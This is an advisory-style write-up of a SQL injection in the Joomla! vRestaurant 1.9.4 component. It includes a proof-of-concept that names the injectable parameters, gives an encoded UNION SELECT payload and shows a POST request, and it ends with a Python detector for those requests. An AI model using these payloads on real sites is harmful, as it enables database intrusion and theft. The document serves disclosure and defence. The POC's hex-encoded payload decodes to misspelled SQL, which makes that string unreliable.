## Vulnerability Overview

Vulnerability name: Joomla! Component vRestaurant 1.9.4 - SQL Injection
EDB-ID: 46228
Author: Ihsan Sencan
Type: WEBAPPS
Platform: PHP
Date: 2019-01-23
Description: Joomla! Component vRestaurant 1.9.4 contains a SQL injection vulnerability.

## Scope of Impact

Affected software: Joomla! Component vRestaurant 1.9.4
Test environment: WIN7_x64/KaliLinux_x64
Vulnerability class: Webapps

## Remediation

Recommendation: update Joomla! Component vRestaurant to the latest version, or apply other security measures to prevent SQL injection attacks.

## POC Code

```plaintext
Exploit Title: Joomla! Component vRestaurant 1.9.4 - SQL Injection
Dork: N/A
Date: 2019-01-23
Exploit Author: Ihsan Sencan
Vendor Homepage: http://awdtech.com/
Software Link: https://extensions.joomla.org/extensions/extension/a-beverage/vrestaurant/
Version: 1.9.4
Category: Webapps
Tested on: WIN7_x64/KaliLinux_x64
CVE: N/A

POC:

1) http://localhost/[PATH]/menu-listing-layout/menulists
127%20%75%6e%69%6e%20%20%73%61%6c%65%63%74%20%28%28%53%45%4c%45%43%54%28%40%78%29%40%52%4f%4d%28%53%45%4c%45%43%54%28%40%78%3a
keysearch=[SQL]
categories[]=[SQL]
min=[SQL]
max=[SQL]

POST /[PATH]/menu-listing-layout/menulists HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
Cookie: 109dc66a46474552f38b0164f24ac07=16c226621aab1d9d01c05431e9b453b3
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

canonid=236&Itemid=303&keysearch= union select
```
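A defender-side check for the injection pattern in this advisory, added here as an example (it is not part of the advisory or of the vRestaurant component): it inspects requests to the `menulists` endpoint and flags the `keysearch`, `categories[]`, `min` and `max` parameters when their value, after percent-decoding, carries a UNION SELECT or the `(SELECT(@x)FROM(SELECT(@x:=0x00)` idiom seen in the POC. The sample requests are constructed, and `/site` stands in for the advisory's `[PATH]`.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Endpoint and parameters the advisory's POC names as injectable.
ENDPOINT = "/menu-listing-layout/menulists"
INJECTABLE = {"keysearch", "categories[]", "min", "max"}

# Signatures from the POC payload: UNION SELECT, and the MySQL user-variable
# idiom (SELECT(@x)FROM(SELECT(@x:=0x00)... it uses to concatenate rows.
SIGNATURES = [
    re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    re.compile(r"\(select\s*\(\s*@\w+\s*\)\s*from\s*\(select\s*\(\s*@\w+\s*:=", re.I),
]

def decode(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so hex-encoded (%75%6e%69%6f%6e = union)
    and double-encoded values are matched in plain form."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(form: str) -> list[str]:
    """Injectable parameter names whose value matches a signature; `form` is
    x-www-form-urlencoded text (a GET query string or a POST body)."""
    return sorted(
        name
        for name, values in parse_qs(form, keep_blank_values=True).items()
        if name in INJECTABLE
        and any(sig.search(decode(v)) for v in values for sig in SIGNATURES)
    )

def scan_request(url: str, body: str = "") -> list[str]:
    """Flag a request to the menulists endpoint, checking query string and body."""
    parts = urlsplit(url)
    if not parts.path.endswith(ENDPOINT):
        return []
    return sorted(set(suspicious_params(parts.query)) | set(suspicious_params(body)))

# Constructed sample requests (not real traffic); "/site" stands in for [PATH].
BASE = "http://localhost/site"
SAMPLES = [
    (BASE + ENDPOINT + "?keysearch=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%201,2", ""),
    (BASE + ENDPOINT, "canonid=236&Itemid=303&keysearch= union select "
     "(SELECT(@x)FROM(SELECT(@x:=0x00),1)x)"),
    (BASE + ENDPOINT + "?keysearch=pizza&min=5&max=20", ""),
    (BASE + "/index.php?keysearch=1%20union%20select%201", ""),
]
```

Requests to other paths are ignored on purpose so the rule stays scoped to the vulnerable endpoint; widen `ENDPOINT` if the site mounts the component elsewhere.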